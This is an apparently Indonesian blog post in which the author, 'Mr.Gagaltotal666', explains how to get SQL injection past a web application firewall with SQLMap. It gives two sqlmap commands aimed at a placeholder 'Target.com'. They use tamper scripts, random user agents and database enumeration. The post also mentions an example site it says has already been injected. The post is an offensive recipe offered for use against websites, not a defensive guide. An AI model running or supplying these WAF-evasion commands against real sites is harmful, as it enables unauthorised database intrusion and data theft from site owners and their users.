Assalamualaikum Wr.Wb...
dengan diberikan nikmat dan rezeki dari Allah SWT, saya Mr.Gagaltotal666 akan
berbagi kepada anda yaitu tentang cara Bypass WAF SQL Injection
Menggunakan SQLMap di GNU/Linux.
sedikit penjelasan Bypass WAF
WAFF adalah kepanjangan (Web Application Firewall) dimana WAF
itu dipasang sebagai firewall security web untuk keamanan suatu server..
contoh...
jika anda ingin mendalamkan atau ngoprek full Bypass WAF
silakan baca dari OWASP [disini]
oke langsung saja ikuti langkah berikut
buka terminal/console di linux anda
contoh sederhana untuk bypass waf di SQLMap
$ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
$ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs
full sintak Bypass WAF di SQLMAP silakan pelajari [disini]
contoh target/site yang sudah ke inject
done...
Video tutorial
oke mungkin itu saja mengenai Bypass WAF di SQLMAP
kalau ada kesalahan dan kekurangan nya mohon
berikan masukan nya ya
sekian dan semoga bermanfaat...
Wasalamualaikum Wr.Wb...
0 Comments